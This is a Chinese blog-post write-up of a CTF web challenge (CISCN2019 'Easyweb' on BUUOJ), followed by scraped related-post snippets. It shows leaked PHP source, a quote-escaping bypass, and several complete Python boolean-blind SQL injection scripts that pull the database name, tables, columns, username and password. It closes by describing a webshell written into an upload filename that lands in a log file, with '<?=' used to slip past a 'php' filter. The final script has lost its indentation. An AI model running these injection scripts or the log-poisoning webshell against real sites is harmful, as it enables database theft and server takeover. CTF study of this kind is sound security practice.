2. 程式人生 > 實用技巧 >sql bool盲注

sql bool盲注

阿新 發佈:2020-10-10

[CISCN2019 總決賽 Day2 Web1]Easyweb

考察:

  1. robots.txt

  2. image.php?bak檔案洩露,image.php.bak可以下載別的不大行

  3. 盲注

  4. php日誌掛馬

  5. <?=可以繞過檢測

初步工作

進入8fd7a79f-9b3c-4c4b-9d03-c8e1b7006a3a.node3.buuoj.cn/robots.txt

Disallow: *.php.bak

對暴露的php檔案進行測試,

user.php,image.php.bak

image.php.bak存在,得到原始碼如下。

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19

分析原始碼

addslashes()函式,這個函式會把特殊的字元轉義。

比如:單引號會被轉義成\',斜槓會轉義為\\.

第十行的str_replace會把"\\0","%00","\\'","'"中的任意一個替換成空。

我們可根據這個繞過當傳入id=\\0時,就會在 查詢語句處改變sql語句。

即:select * from images where id=' \' or path='+{$path}'

所以我們可以在path處注入我們的新語句,

由於沒有查詢結果回顯,所以此處是盲注。

正式編寫指令碼

編指令碼就很累了,寫的水平垃圾的一,寫了好久。

爆資料庫名長度。

其實這一步可以不用的,就是測驗自己的理論,加上學習。

import requests
url = "http://8fd7a79f-9b3c-4c4b-9d03-c8e1b7006a3a.node3.buuoj.cn/image.php?id=\\0&path=or 1="

for i in range(30):
    payload = "if(length(database())=%d,1,-1)%%23" % (i)
    #print(url+payload)
    r = requests.get(url+payload)
    if b"JFIF" in r.content :
        print(i)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

爆資料庫名字

為:ciscnfinal

import requests
url = "http://8fd7a79f-9b3c-4c4b-9d03-c8e1b7006a3a.node3.buuoj.cn/image.php?id=\\0&path=or 1="
result = ""
last = "tmp" #用於判斷可不可以終止
i = 0

while( result != last ):
	i = i + 1 
	head=32
	tail=127
	while( head < tail ):
		mid = (head + tail) >> 1
		payload = "if(ascii(substr(database(),%d,1))>%d,1,-1)%%23"%(i,mid)
		# print(url+payload)
		r = requests.get(url+payload)

		if b"JFIF" in r.content :
			head = mid + 1
		else:
			tail = mid
	
	last = result
	
	if chr(head)!=" ":
		result += chr(head)
	print(result)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26

爆資料表的表名

記得看一下名字裡包不包括原始碼洩露的images表,可以作為你的指令碼正確性驗證。

有: images,users

import requests
url = "http://8fd7a79f-9b3c-4c4b-9d03-c8e1b7006a3a.node3.buuoj.cn/image.php?id=\\0&path=or 1="
result = ""
last="tmp"
i=0
while( last != result ):
    
	i=i+1
	head=32
	tail=127
	while head < tail :

		mid = ( head + tail ) >> 1
		payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() ),%d,1))>%d,1,-1)%%23"%(i,mid)
		#print(url+payload)
		r = requests.get(url+payload)
		if b"JFIF" in r.content :
			head = mid + 1
		else:
			tail = mid
            
	last = result
	if chr(head)!=' ' :
		result += chr(head)
	print(result)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26

爆資料表的列

爆列的時候注意,因為過濾了雙單引號,且我們沒有函數了,所以此時要把表明轉成16進位制

hex(“users”) = 0x7573657273

為:username,password

import requests
url = "http://3fe6495a-a056-4420-9b4a-d5d5ff38b64d.node3.buuoj.cn/image.php?id=\\0&path=or 1="
result = ""
last="tmp"
i=0
while( last != result ):
	i=i+1
	head=32
	tail=127

	while( head < tail ):

		mid = ( head + tail ) >> 1

		payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273 ),%d,1))>%d,1,-1)%%23"%(i,mid)
		
		r = requests.get(url+payload)
		if b"JFIF" in r.content :
			head = mid + 1
		else:
			tail = mid

	last = result
	if(chr(head)!=' '):
		result += chr(head)
	print(result)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27

爆username欄位

admin

import requests
url = "http://3fe6495a-a056-4420-9b4a-d5d5ff38b64d.node3.buuoj.cn/image.php?id=\\0&path=or 1="
result = ""
last="tmp"
i=0
while( last != result ):
	i=i+1
	head=32
	tail=127

	while( head < tail ):

		mid = ( head + tail ) >> 1

		payload = "if(ascii(substr((select group_concat(username) from ciscnfinal.users ),%d,1))>%d,1,-1)%%23"%(i,mid)
		
		r = requests.get(url+payload)
		if b"JFIF" in r.content :
			head = mid + 1
		else:
			tail = mid

	last = result
	if(chr(head)!=' '):
		result += chr(head)
	print(result)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27

爆username欄位password

import requests
import time


url = "http://e90944d1-1737-46ec-a95c-5502fffc68f6.node3.buuoj.cn/image.php/"
# payload = {
# "id":"",
# #"password":""
# }
result = ""
for i in range(1,50):
time.sleep(0.01)
l = 32
r =128
mid = (l+r)>>1
while(l<r):
payload = url+"?id=\\\\0"+"&path=or 1="+"(ascii(substr((select group_concat(password) from users),{0},1))>{1})%23".format(i,mid)
html = requests.get(url=payload)#data=payload
#print(payload)
if b'JFIF' in html.content:
l = mid+1
else:
r = mid
mid = (l+r)>>1
# if(chr(mid)==" "):
# break
result = result + chr(mid)
print(result)
print("flag: " ,result)

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27

登入

我們有了使用者名稱和密碼。

登入進去後,簡單上傳測試後發現,他會把檔名放到日誌。

所以把木馬寫到檔名即可,注意過濾了php。

可以用<?=來繞過。

上傳之後,getshell,去根目錄把flag檔案讀了即可。

注意:圖片資料判斷存在時前+b以二進位制的方式讀取

相關推薦

sql bool

[CISCN2019 總決賽 Day2 Web1]Easyweb 考察: robots.txt image.php?bak檔案洩露,image.php.bak可以下載別的不大行

BUUOJ | [CISCN2019 華北賽區 Day2 Web1]Hack World(SQL布林

題目地址 用瀏覽器連線靶機,看到以下頁面 右鍵檢視原始碼,發現上傳用的是 post 請求,根據提示知道 flag 位於 flag 表中的 flag 欄位裡

SQL注入——

前言 在某些情況下後臺會使用錯誤訊息遮蔽來遮蔽報錯,同時無法根據報錯資訊來進行判斷,在這時我們需要用到。而分為兩種,一種為布林,一種為時間

SQL注入--

SQL注入-- 使用的原因,是管理員關閉了回顯,無法獲知報錯情況 0x00

SQL注入技巧之顯中過濾逗號繞過詳析

前言 sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分

CTF-sql-order by

本文章只討論了order by,關於order by的報錯等注入不在本文章討論範圍,另有文章。

SQL Server手之延時型時間

近來處理安全問題遇到的sql注入: 延時函式 WAITFOR DELAY WAITFOR是SQL Server中Transact-SQL提供的⼀個流程控制語句。它的作⽤就是等待特定時間,然後繼續執⾏後 續的語句。它包含⼀個引數DELAY,⽤來指定等待的時

SQL注入漏洞--和寬位元組注入

是注入的一種,指的是在不知道資料庫返回值的情況下對資料中的內容進行猜測,實施SQL注入。一般分為布林和基於時間的和報錯的

[sql 注入] insert 報錯注入與延時

insert注入的技巧在於如何在一個欄位值內構造閉合。 insert 報錯注入 演示案例所用的表:

初學Web安全之sql注入(四)—— (1)

當你的輸入沒有回顯,也沒有報錯的時候,但是輸入正確和錯誤的值時,頁面有不同表現時,這時候我們可以嘗試使用布林

END的學習 SQL注入繞過 and POST基於時間和布林的

SQL注入繞過 1,大小寫繞過 2,雙寫繞過 3,編碼繞過 可以使用URL編碼,ASCII,HEX,unicode編碼繞過

一道題講懂SQL / [第一章 web入門]SQL注入-2

概述 本題是一個題,可以基於布林也可以基於時間,如果不會的話可以根據提示在網址後面加一個?tips=1降低難度成為一個基於報錯的

[CTF]基於布林的SQL

文章目錄 前言 [CTF學習]基於布林的SQL 一、題目 提  示: 基於布林的SQL 描  述: sql注入

dvwa sql教程

原文地址:https://www.jianshu.com/p/757626cec742 一、DVWA-SQL Injection(Blind)測試分析 SQL VS 普通SQL注入:

十六:SQL注入之查詢方式及報錯

在很多入時,有很多注入會出現無回顯的情況,其中不回顯的原因可能是SQL查詢語句有問題,這時候我們需要用到相關的報錯或者盲注進行後續操作,同時作為手工注入的時候,需要提前瞭解SQL語句能更好的選擇對應的

使用位運算使sql更加高效

如何提高sql的效率和命中率一直是個值得研究的問題 目前的主流方法有 1.遍歷

CTFSHOW-日刷-[萌新賽]萌新記憶/sql

有4個段子,檢視前端沒思路,開掃描 發現存在admin目錄 發現存在注入 fuzz測試一波

SQL注入之查詢方式及報錯

前言 當進行SQL注入時,有很多注入會出現無回顯的情況,其中不回顯的原因可能是SQL語句查詢方式的問題導致,這個時候我們需要用到相關的報錯或盲注進行後續操作,同時作為手工入時,提前瞭解或預知其SQL語句大概寫

一次sql實戰_easysql writeup

一次sql實戰 前言 題目為一道ctf web滲透題。需要滲透到資料庫拿到正確flag並提交。

WEB安全-SQL注入漏洞測試(時間)

前言 這是SQL注入的第八篇,之前忙著學校的考試,現在結束了就可以再專心打靶場一段時間了